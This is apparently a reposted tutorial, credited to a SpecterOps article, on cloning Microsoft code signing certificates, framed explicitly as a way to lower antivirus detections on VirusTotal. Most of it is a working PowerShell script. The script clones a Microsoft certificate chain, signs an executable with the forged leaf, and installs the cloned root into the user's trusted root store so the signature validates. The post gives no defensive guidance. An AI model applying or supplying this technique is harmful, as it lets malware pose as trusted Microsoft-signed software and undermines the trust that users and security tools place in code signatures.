Code signing is an important security mechanism that allows users to establish trust in the application they are about to run. For security purposes, developers must use code signing certificates to confirm that the application is legitimate and has not been modified by intruders.

How does a code signing certificate get cloned?

To understand how this attack works, you need to understand how the code signing process works. When signing code, a key pair (public and private key) is used to create a digital signature, which is then attached to the application. When the user runs the application, the operating system verifies the digital signature using the public key to ensure that the application has not been modified after it has been signed.

Cloning a code signing certificate is done as follows. We simply export a certificate from someone else's signed application and sign our own application with it. At least 50% of anti-viruses don't check certificates for validity, they just check the name, thus we can reduce the number of detections on VirusTotal.

Exporting a certificate from someone else's application:

The script creates an example application (hello world), signs the file and adds the certificate to the certificate store - "Cert:\CurrentUser\Root", which refers to the current user in the Windows operating system. This repository stores the root trust certificates issued by the certificate authorities.

Signature script:

# We'll just store the cloned certificates in current user "Personal" store for now.
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }

$MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation

$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation

$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer
$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation

# Create some sample code to practice signing on
Add-Type -TypeDefinition @'
public class Foo {
    public static void Main(string[] args) {
        System.Console.WriteLine("Hello, World!");
        System.Console.ReadKey();
    }
}
'@ -OutputAssembly C:\Test\HelloWorld.exe

# Validate that that HelloWorld.exe is not signed.
Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe

# Sign HelloWorld.exe with the cloned Microsoft leaf certificate.
Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath C:\Test\HelloWorld.exe
# The certificate will not properly validate because the root certificate is not trusted.

# View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
# "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe | Format-List *

# Save the root certificate to disk and import it into the current user root store.
# Upon doing this, the HelloWorld.exe signature will validate properly.
Export-Certificate -Type CERT -FilePath C:\Test\MSKernel32Root_Cloned.cer -Cert $Cloned_MS_Root_Cert
Import-Certificate -FilePath C:\Test\MSKernel32Root_Cloned.cer -CertStoreLocation Cert:\CurrentUser\Root\

# You may need to start a new PowerShell process for the valid signature to take effect.
Get-AuthenticodeSignature -FilePath C:\Test\HelloWorld.exe

Video of the script:

Source: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec